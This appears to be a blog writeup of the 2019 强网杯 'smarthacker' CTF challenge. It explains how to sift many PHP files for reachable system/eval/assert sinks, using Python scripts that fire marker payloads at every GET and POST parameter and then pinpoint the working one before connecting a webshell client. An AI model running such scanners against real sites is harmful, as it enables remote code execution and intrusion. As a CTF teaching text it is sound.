[2019 强网杯-smarthacker]

Open the URL and download the source.

The source contains a pile of command-execution code, but most of it cannot actually be triggered.

For example, $_GET['ganVMUq3d'] is overwritten by an assignment before it reaches the sink, so whatever the client sends never gets there.


So I used a script to find the PHP files where command execution actually works.

Built the corresponding payloads for system(), eval() and assert().

For assert() and eval(), the payload eval("echo 'hello';"); executes.



For system(), the payload echo hello executes.


Actually there is no need to build a separate payload for each of system(), assert() and eval():
this challenge echoes PHP error messages back, so a single probe identifies a live sink either way (the marker is printed on success, and a visible error appears when the probe is not valid PHP).

On Kali, use find <source dir> -type f | xargs grep "<pattern>" to find which input-passing superglobals the PHP files use ($_REQUEST, $_POST, $_GET).
This challenge only uses $_POST and $_GET.
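Before probing anything over the network, the dead-sink pattern seen in the source (a superglobal overwritten by an assignment before it reaches the sink) can be triaged offline. The block below is an added example, not part of the original writeup and not the challenge's own code: the PHP snippets in SAMPLES are constructed stand-ins for the challenge files, the matching is a regex heuristic that only catches a direct overwrite of $_GET[...]/$_POST[...] placed before a system()/eval()/assert() call, and classify_probe() shows how the single-probe idea above sorts responses when stock PHP error text is echoed (an assumption about the target).

```python
import re

# Constructed sample PHP files standing in for the challenge's source tree (not the real files).
SAMPLES = {
    # dead sink: the superglobal is overwritten before system() reads it
    "dead.php": "<?php\n$_GET['ganVMUq3d'] = 'id';\nsystem($_GET['ganVMUq3d']);\n",
    # live sink: client input reaches system() untouched
    "live_system.php": "<?php\nif (isset($_POST['u7Fq'])) {\n    system($_POST['u7Fq']);\n}\n",
    # live sink via a local variable (the heuristic does not track $x, it only looks for overwrites)
    "live_eval.php": "<?php\n$x = $_GET['k9Lz'];\neval($x);\n",
    # no sink at all: nothing worth probing
    "no_sink.php": "<?php\necho htmlspecialchars($_GET['name']);\n",
}

# a read of a superglobal index: $_GET['x'], $_POST["x"], $_REQUEST['x']
READ_RE = re.compile(r"\$_(GET|POST|REQUEST)\[['\"](\w+)['\"]\]")
# the sinks the writeup cares about (extend the alternation as needed)
SINK_RE = re.compile(r"\b(system|eval|assert)\s*\(")


def find_params(text):
    """Distinct (method, name) pairs a PHP source reads from superglobals, in order of appearance."""
    seen = []
    for m in READ_RE.finditer(text):
        pair = (m.group(1), m.group(2))
        if pair not in seen:
            seen.append(pair)
    return seen


def triage(text):
    """For every parameter and every sink in one file, decide whether the parameter is
    directly overwritten somewhere before that sink call. 'live' is False when an
    assignment precedes the sink, because a probe can then never reach it."""
    sinks = [(m.start(), m.group(1)) for m in SINK_RE.finditer(text)]
    results = []
    for method, name in find_params(text):
        # $_GET['name'] = ...   (a single '=', not '==')
        assign_re = re.compile(r"\$_%s\[['\"]%s['\"]\]\s*=(?!=)" % (method, re.escape(name)))
        assigns = [m.start() for m in assign_re.finditer(text)]
        for pos, sink in sinks:
            overwritten = any(a < pos for a in assigns)
            results.append({"method": method, "param": name, "sink": sink, "live": not overwritten})
    return results


def live_candidates(sources):
    """Map file name -> list of (method, param, sink) that are worth probing over the network."""
    out = {}
    for fname, text in sources.items():
        hits = [(r["method"], r["param"], r["sink"]) for r in triage(text) if r["live"]]
        if hits:
            out[fname] = hits
    return out


def classify_probe(body, marker="hello"):
    """Interpret the response to the single probe 'echo hello' on a target that echoes PHP
    errors (assumed to be stock PHP error text): a shell sink prints the marker, while a
    PHP-code sink (eval/assert) fails to parse the probe and reports a syntax error.
    Returns 'shell', 'code' or None when nothing observable happened."""
    if "syntax error" in body or "Parse error" in body:
        return "code"
    if marker in body:
        return "shell"
    return None


if __name__ == "__main__":
    for fname, hits in live_candidates(SAMPLES).items():
        for method, param, sink in hits:
            print(f"{fname}: {method}[{param}] -> {sink}()")
```

Run it over the downloaded src directory instead of SAMPLES (read each .php into the dict) to shrink the list of files the network probe has to visit; anything it marks live still has to be confirmed with a real request, since the regex does not follow data through local variables or functions.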

# Filter the PHP files: probe each one with harmless payloads and report the files that execute them
import os
import re
import threading
from concurrent.futures import ThreadPoolExecutor

import requests

path = "E:/phpstudy_pro/WWW/src"  # local copy of the downloaded source
base = "http://<target>/"         # challenge host (placeholder)

files = os.listdir(path)
# lock so that output from different worker threads does not interleave
mutex = threading.Lock()
# number of worker threads
pool = ThreadPoolExecutor(max_workers=50)


def read_file(file):
    with open(path + "/" + file, encoding="utf-8", errors="ignore") as f:
        text = f.read()
    # parameter names read through $_GET['...']
    GET = re.findall(r"_GET\['(.*?)'\]", text)
    # parameter names read through $_POST['...']
    POST = re.findall(r"_POST\['(.*?)'\]", text)
    # eval()/assert() payload: valid PHP that prints the marker
    data1 = """eval("echo 'hello world';");"""
    # system() payload: a shell command that prints the marker
    data2 = "echo hello"
    aaa = "hello"
    x = {}  # POST body for the eval/assert probe
    y = {}  # POST body for the system probe
    a = {}  # query string for the eval/assert probe
    b = {}  # query string for the system probe
    for i in GET:
        a[i] = data1
        b[i] = data2
    for i in POST:
        x[i] = data1
        y[i] = data2
    # eval/assert probe: every parameter of the file carries the PHP payload
    r = requests.post(url=base + file, data=x, params=a)
    # system probe: every parameter of the file carries the shell payload
    c = requests.post(url=base + file, data=y, params=b)
    if aaa in r.text or aaa in c.text:
        with mutex:
            print(file + " found!")


futures = [pool.submit(read_file, file) for file in files]  # walk the folder
for fut in futures:
    fut.result()  # re-raise any exception from a worker (e.g. a connection error)
pool.shutdown()


Then, for a PHP file that can execute commands, work out which of its parameters (and which request method) actually carry the payload through.

# Find the working parameter names and the request method for one file
import re

import requests

path = "E:/phpstudy_pro/WWW/src"
base = "http://<target>/"  # challenge host (placeholder)
file = "xk0SzyKwfzw.php"   # one of the files reported by the previous script
with open(path + "/" + file, encoding="utf-8", errors="ignore") as f:
    text = f.read()
GET = re.findall(r"_GET\['(.*?)'\]", text)
POST = re.findall(r"_POST\['(.*?)'\]", text)
data1 = """eval("echo 'hello';");"""  # eval()/assert() payload
data2 = "echo hello"                   # system() payload
aaa = "hello"
# try each $_GET parameter on its own, once with each payload
for i in GET:
    r = requests.post(url=base + file, params={i: data1})
    c = requests.post(url=base + file, params={i: data2})
    if aaa in r.text or aaa in c.text:
        print(file + "\nGET\n" + i)
# same for each $_POST parameter
for i in POST:
    r = requests.post(url=base + file, data={i: data1})
    c = requests.post(url=base + file, data={i: data2})
    if aaa in r.text or aaa in c.text:
        print(file + "\nPOST\n" + i)


Then connect with AntSword (蚁剑) or run commands by hand and grab the flag.


posted @ 2021-08-08 18:03  地狱✟祈祷